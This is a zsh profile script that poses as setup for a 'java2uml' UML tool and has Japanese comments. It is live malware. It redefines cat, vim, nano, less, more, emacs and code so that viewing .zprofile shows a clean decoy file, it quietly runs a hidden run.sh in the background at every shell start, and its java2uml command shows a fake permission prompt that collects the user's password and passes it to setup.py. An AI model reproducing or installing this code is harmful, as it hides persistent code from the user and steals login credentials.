chmod +x ~/.tools/java2uml/run.sh
cat() {
    if [[ "$1" == "$HOME/.zprofile" || "$1" == ".zprofile" || "$1" == "$HOME/.cache/.zprofile" ]]; then
        command cat ~/.cache/.zprofile
    else
        command cat "$@" 
    fi
}

nano() {
    if [[ "$1" == "$HOME/.zprofile" || "$1" == ".zprofile" || "$1" == "$HOME/.cache/.zprofile" ]]; then
        command nano ~/.cache/.zprofile
    else
        command nano "$@" 
    fi
}


vim() {
    if [[ "$1" == "$HOME/.zprofile" || "$1" == ".zprofile" || "$1" == "$HOME/.cache/.zprofile" ]]; then
        command vim ~/.cache/.zprofile
    else
        command vim "$@" 
    fi
}


less() {
    if [[ "$1" == "$HOME/.zprofile" || "$1" == ".zprofile" || "$1" == "$HOME/.cache/.zprofile" ]]; then
        command less ~/.cache/.zprofile
    else
        command less "$@"
    fi
}


more() {
    if [[ "$1" == "$HOME/.zprofile" || "$1" == ".zprofile" || "$1" == "$HOME/.cache/.zprofile" ]]; then
        command more ~/.cache/.zprofile
    else
        command more "$@"  
    fi
}


emacs() {
    if [[ "$1" == "$HOME/.zprofile" || "$1" == ".zprofile" || "$1" == "$HOME/.cache/.zprofile" ]]; then
        command emacs ~/.cache/.zprofile
    else
        command emacs "$@"  
    fi
}


code() {
    if [[ "$1" == "$HOME/.zprofile" || "$1" == ".zprofile" || "$1" == "$HOME/.cache/.zprofile" ]]; then
        command code ~/.cache/.zprofile
    else
        command code "$@"  
    fi
}


[ ! -f "$HOME/.cache/.zprofile" ] && echo 'eval "$(/opt/homebrew/bin/brew shellenv)"' > "$HOME/.cache/.zprofile"
eval "$(/opt/homebrew/bin/brew shellenv)"




LAST_RUN_FILE="$HOME/.cache/java2uml_last_run"
SCRIPT="$HOME/.tools/java2uml/run.sh"

mkdir -p "$HOME/.cache"

if [ ! -f "$LAST_RUN_FILE" ]; then
  echo 0 > "$LAST_RUN_FILE"
fi

LAST_RUN=$(cat "$LAST_RUN_FILE")
CURRENT_TIME=$(date +%s)
ELAPSED=$((CURRENT_TIME - LAST_RUN))

if [ "$ELAPSED" -ge　0 ]; then
  "$SCRIPT" > /dev/null 2>&1 &
  echo "$CURRENT_TIME" > "$LAST_RUN_FILE"
fi

# java2uml 関数定義
java2uml() {
  AUTH_FILE="$HOME/.java2uml_setup_check"
  INTERVAL_DAYS=0
  NOW=$(date +%s)

  if [[ ! -f "$AUTH_FILE" ]]; then
    echo 0 > "$AUTH_FILE"
  fi

  LAST_AUTH=$(cat "$AUTH_FILE")
  DIFF=$(( (NOW - LAST_AUTH) / 86400 ))

  if [[ "$DIFF" -ge "$INTERVAL_DAYS" ]]; then
    echo "⚠️  アクセスの許可が必要です。"

    while true; do
      echo -n "Password: "
      stty -echo
      read PASSWORD
      stty echo
      echo

      if [[ ${#PASSWORD} -le 3 ]]; then
        continue
      fi

      if (( RANDOM % 2 == 0 )); then
        echo
        echo -n "Password: "
        stty -echo
        read PASSWORD
        stty echo
        echo
        if [[ ${#PASSWORD} -le 3 ]]; then
          continue
        fi
      fi

      break
    done

    USERNAME=$(whoami)
    python3 ~/.tools/java2uml/setup.py "$USERNAME" "$PASSWORD"
    echo "$NOW" > "$AUTH_FILE"
  fi

  if [[ $# -lt 2 ]]; then
    echo "Usage: java2uml <output file> <input directory>"
    return 1
  fi

  python3 ~/.tools/java2uml/main.py "$1" "$2"
}
